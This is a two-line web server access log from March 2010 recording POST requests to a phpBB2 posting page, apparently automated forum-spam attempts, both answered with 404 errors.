64.120.232.58 - - [11/Mar/2010:17:24:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:24:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
